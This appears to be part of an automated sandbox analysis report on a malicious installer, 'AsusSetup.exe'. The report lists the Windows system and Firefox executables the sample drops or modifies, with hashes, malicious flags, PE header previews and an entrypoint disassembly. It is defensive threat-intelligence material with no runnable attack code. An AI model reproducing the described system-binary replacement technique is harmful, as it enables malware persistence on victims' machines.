                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3CED139A6700724FA65DB86D49271A3F3A79E3021954DE06A7DC665926CC25BD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BF276902FE6C9D1FD1C64CC2A91CB4A72D14FCFF6FF398BBECB383EDFA6075D421D785ABD58B306A2A13DF82CA7BAB019B541AC57207FA16F50138D4AB5A8D2C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1564160
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.005844464611706
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:dWLntIfGpI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ERIeGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:70E36F3EE85DCC5CA01169074BF457CD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B48DCFE285361BBA82CE16F2573C48F5F04FC7E3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:095645AFCB345C476BEE4EFC905BCAAD3DF07B8EBC8F9A05B933BDDC24446CD3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2FE241D2759B4137F02647634F3ED7378F8538553004B73DB2FDFD2FD416BD73E07DC8D0AC7749FA61DD0D6706BF393D54C2C394898EB444529458249B3526FB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#.....P=.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1340928
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.616074321463117
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:zIhciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:im/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EF86EAAE750ADF36B3A610E1EC6672AC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:37FA9DEE20A2994BADB90E5835DED3CCDDC14B8E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7FD28D7ABF6FFD3A6B90AEC4F55F0BB5DF2E70C241699481D78BEA67AB8D40E6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:339D89085B472521F7F3C4A6B24A3511C2D9F89805279A33E76D698EFA7F001FA87F4B8238F1EC50A9D441B82E3B81C473D38DFCF0B9A019C44F57BED5BE7E64
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................yz.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1687552
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.018642981028978
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a8oRcwt2ioQ3J+Rr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:a8oRBoFrLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2ABCEE9773CE77DBBB8BB75C65B49253
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2D7E879710CF84E773A896EA2C0514609F8169BF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B8979FD640E348AF42655AC2D3182EA160ABF2B3B312CFF025301256C5AA6436
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BE065C07A018A59F4FFC1B05920764AEC875489FB9A2F0D6722923F7547D5CBEA780F6F2DD394E98E6C7FF49070AB6CD9F716BD7BECB5EC175538F44970DFC56
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%......j.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\9fbf4662b248c49c.bin

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.985020614765465
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:IYGt5eicwZCTYOuyyCL3XqikaOeibTzSXxbbNLD30MMY8lYD6s+OOcXX8A1ghRz2:IYUeicwQuy/5kXHSBbbRDkMv/R2z9W6A
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:40EBCF90DAA58AA95B9EF6B38150AF45
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:558899812B595239E1DDB3BE930DEDC2F7C2F575
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D7DA94BB7260ADCDB51E59ED70A1B0FC3245D30D105D6A3B5FCC574B83EC61CE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:97ABD913D2A578F7A59381E434701CCD068225A13F310D58C1C843DB6A12A2C54E28EA0605ADE789D630EA9A792C13C2F6AFF33AC0BB20AC496958FF9BACECEC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:o..M......J........G.7.Cr...;n!.0..Ca.^.N..`.f..t..ZK....=...a...../:a...$^........g...W.V2....t.l..c..S@.O.t.wP..3._.6vU..#^G.:Nk.......;:Y5J%.R...'...tPn~... ..I.5....2j..j..`........j. .&.B.......c...(...../....dU...S.-.....J.iF|O.._.f....0Mn.dj.{.../.tT....j..t[.1.V.s...f.........k.P......Xns.8..aT........../v.EB.Z.j..........@....m.........U35.LW....qA..|Y.....9............F.t.H..@.."R.k=.X..#..0)...0.F..&....K._|.J|.<.1..0....&.\...h...E....aj8...~.c.....uP/2.........jsk.}#.p.JC..M.j..SMa..U.e....P.xt...".uB.%.=q.F.y...q..V.....3.....c..y..@...le...1..l..o.V.q....?}h}.j.X.m|..U..wC.di.......c...^.e(............4.....a. .Q.^.YS.w...O..Z....~..r...g..$..PC......\u..E.7...?...Ppca..../...@.....O.AK..^..(.....$.......(k...($.i.#.mek...b.?..5..>i.\[Y...px`..,Z...w.B|..5.SMsLa.9..r......].V.X....b)...n.........../..~..S...............0...R"p~.v ...A.'....q.(\.g[V...H......"p^.7UrG.>.s... z.....$.:/....c..*....;.o.v.'-f"..}.H..X...J.J.

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.246049721656164
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:yQW4qoNUgslKNX0Ip0MgHCpoMBOuZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yQW9BKNX0IPgiKMBOuZLNiXicJFFRGNf
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2148D94316FBFFE84543113C6A3C1FA4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:E586090B044D7F5AFC2FE180C2DB5520D063EF40
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A513D27486875542541E080BC08A707DBA71F9D88E0953512619631D0ED797FA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:03FA2707BF34AFF27BDF1E6B098F21CA9E1C4B816A086E1C0A67CFDC07E63A85E841E81539A8D266B5346AD30DA35E38A1356D49EC0616782D8A6A8E1D245832
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................\0.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1379840
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686024492296295
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:t2G7AbHjk6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:t2G7AbHjDLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:515BCDF27D7CB2B02C2977222AEB63DA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2A093BDE624DFE636447060ACE6F83C967C97C5F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:66D9120AD6ED3B96F428ECB779D7602ACB4EACAEB925BC0A854D0902C741FD2C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD8459ED139CA99AB0A8143BF3FA42E464E9A3A4C3E8969D89B6DDC53092727BB5DBB10DDAA40018216742474F158FD2D0C1F16DEA7E93FDB92B0B4A346F320F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................. .....G..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...`...........n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.283007833571848
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:CkdpSI+K3S/GWei+qNv2uG3y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:C6SIGGWei2uG3yLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5E3D1E384655DE6087F47BBB3A38FB17
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:05169F30603E2F7CB3AB500A27716EFAFBF348A4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0664F583DA06764F7EF99AE223D6E7D89FDA6373AC7873C1FF65732BAE6046F9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD68526418071F26F69F7DB314039E452308B497F07FE62B1A9422196098447822EC3B5ACB8396A516CA3C9920F088340219FE4D369C35D223E20C52CA7F1BD0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P....../d.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1381376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.68641580355992
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:0rL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0rLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:332F38054E08BAEC551611993C8D1317
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AFB4ECC9705D0FCAEB8BF2D7942EF79649FCD205
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2805D7B3356302E1A6367E60799038C9FAF4560435E4C3BBA5333D5AAEF5CD73
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:455B16AFCEE3FBB04D1D4A1AC106F895E9AF68283F69FC4818DC353368BEA283BFBE3FC9F3C9B1B8EC6BFA0DB187C5AEB744A66C217ED32E35D1C57C1AC713A1
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. .....]..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Roaming\9fbf4662b248c49c.bin

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.984912691211584
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:6wKQAAcFjV/42kX3z0cdmsaLq7InUPORSj:BKQ52ez0cfQUqSj
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4C758112062B3AF393AF3F7CFBB2F0F3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:08C20726A5185C5AF559D485B960B6A8F993372A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:17224CA1541A5406A6C839F112E7F60F629BFF28DD1076EEB2C032EAA8958309
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B3123A1EDBDF2D79F2C65618FAEE72AA343E2568A704F593FF29948CBA81EE554286C519F42ACF54E28802EC0C9453D4B3BBE66193EC5A2A92C4BF9A7277643B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:.. ..9.:......o;.[.4_.....o..>c|..n5~=...D..rk....?....m.'..V.Y!..".5..ux[.|.,:#.Hd.V.F.{..<..e(...1......bY.%.....,=.....5..C&...GV.i.....V... ..SY...)..*...~.W6...fo...-...v+....>T^.......ff...z.T{..E.....].....`.....#*.vt....K..N...)+....c:I_.X.P....gxh...:3.X....n.n...HI....D.6.e..w....0..Q....\..u..i......Xj...G..............S..&..&....O. ]>.1...%...w..$.)%.H... ....h]Wc.;.SM<...........p.SV.|C....8;.>N..cD..f.1d8.N...CA."...bJ."...Q.[=..H..=...N..F...U....ZW.jS..j.....Bz.A..I.pSB...).v.c>W.Fu).l.*P.).....!.....%zM..!..k.fb.1.X...-..E.tY....\.E.f\......v....K...}.......{....5.~.."~..@.a.j..M.....o..j\.....2*`..~~.a...r....n.1..*..A<~j.7#04...(..-.......G..I..6...._.Z...YT.K....9.....k.....e...nar/..L~........(wf.....WqU....%6.|...K.k.l.;....S ..h.I.b.....dh/b...LN.gZ4..S...V...}..4..,*".6)-3.d.@.@,..04.r.u_.X.....!....1.DI8ae.|._.d..|..1v.S.X.vn.5P.....'..R....W.oy[.f2...-...:..30.......J......?.........Wj.Q.e.X2..h....zq....b.

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1434112
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6849522507957255
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:mIyE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mInLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EDB52E00EF5D312A130E3F1D251A21BA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B01BC3AAD6EFA0453E1FB5D843A3D4CB7ED150AD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:35F3679A6BDADA95605CB850AA548F5F9328BC16677DB251E3CE6E64D2EF6DE9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:28B8B7D5BEDD1BAB0B90FE7F6C95FA2F7F6FE06204027EAE25AE1DEE2E78CDD3DDF795493EC33F41F2ACB4C57624CC9589159480F7B2A0E76960420803D2BD0B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!.....T..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.953364197222141
                                                                                                                                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 60.38%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Windows ActiveX control (116523/4) 34.83%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 3.59%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.60%
                                                                                                                                                                                                                                                                                                                                                                                                                  File name:AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File size:5'251'072 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:13bf2819401d2f983fff90c1960831b8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512:af83b681f62582e9cbf983f6e5e1ba32c3a6ccd7896c644d77a5d5d76b2ca24af85deb6ea6621a0b29e15ab7637ba9f9606b09fb56387461604c38d8ca85502f
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:pmuSFdw5ujhEMdcbJFLOAkGkzdnEVomFHKnPV7wRGpj3:ChKMdcNFLOyomFHKnPpF9
                                                                                                                                                                                                                                                                                                                                                                                                                  TLSH:FE36BF4AAFEC40E8D4A6D035C96B895BD7B6BC601631878F1064775F6F333918E2E326
                                                                                                                                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................c.............................................................................m.............Rich...

                                                                                                                                                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                                                                                                                                                  Icon Hash:57171d4de7912e31

                                                                                                                                                                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                                                                                                  Entrypoint:0x1401cacb4
                                                                                                                                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                                  Time Stamp:0x61615653 [Sat Oct 9 08:44:03 2021 UTC]
                                                                                                                                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Import Hash:624b40321b3d0fd2a008a7271554dd30

                                                                                                                                                                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                                                  call 00007FD1D125307Ch
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                                                                                                                                                                  jmp 00007FD1D12522BFh
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  cmp ecx, dword ptr [000EFBD9h]
                                                                                                                                                                                                                                                                                                                                                                                                                  jne 00007FD1D1252455h
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  rol ecx, 10h
                                                                                                                                                                                                                                                                                                                                                                                                                  test cx, FFFFh
                                                                                                                                                                                                                                                                                                                                                                                                                  jne 00007FD1D1252445h
                                                                                                                                                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  ror ecx, 10h
                                                                                                                                                                                                                                                                                                                                                                                                                  jmp 00007FD1D1252AA4h
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  inc eax
